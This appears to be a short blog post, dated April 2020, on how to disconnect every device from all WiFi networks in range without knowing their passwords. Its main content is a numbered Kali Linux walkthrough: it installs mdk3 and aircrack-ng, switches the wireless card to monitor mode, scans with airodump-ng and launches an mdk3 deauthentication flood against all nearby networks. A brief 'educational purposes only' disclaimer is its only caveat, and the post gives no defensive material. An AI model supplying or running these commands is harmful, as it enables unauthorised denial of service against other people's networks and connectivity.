How to disconnect everyone from the WiFi network in your range without even knowing the password - kapish singh

Latest

WE Are Known To Provide Premium Content Which Helps User TO Get Best Information We Works In All Aspects Of Life so We Have All conten Fell free to ask A Powerful Blog Which keeps you updated about daily news and daily important notes important for UPSC perspective which enhances your knowledge with a tremendous amount of data in simple language keep like and subscribe to our feed and feel free to ask any question in the contact form

Search Bar

Friday, 24 April 2020

How to disconnect everyone from the WiFi network in your range without even knowing the password

How to disconnect everyone from the WiFi network in your range without even knowing the password.


Yes this is possible to disconnect everyone from the WiFi network in your range without even knowing the password. All you need is a computer running on Linux or a Virtual Machine WIth Kali Linux WIth Data Card (WiFi Receiver).

Note- This is only for educational purposes. please don’t harm anyone without their permission.

Hey Guys Back Again, today I will show you how you can block every wifi network  in your range

using Kali Linux



step 1 ). first of all, we need to update our system by this command :


                                      sudo apt update ; sudo apt upgrade

step 2 ). then we have to install  a package called mdk3 by this command :


sudo apt install mdk3
                                              


Note: If the package is already installed then avoid step 2



step 3 ). now install the aircrack-ng package (if not installed)



sudo apt install aircrack-ng



step 4 ). Now all are set and we are good to go



step 5 ). now we have to put our network  card in the monitor mode by this :



 sudo airmon-ng check kill


 sudo airmon-ng start wlan0 

  


(wlan0 is my wireless card name i.e Computer WiFi Hardware)







         



step 6 ). Now we have to scan all the networks near to us by this



sudo airodump-ng wlan0mon   









                 





step 7 ). Now its time to put down every network



                                             sudo mdk3 wlan0mon d






DONE



For stopping this attack you have to just press ctrl+c from your keyboard

No comments:

Post a Comment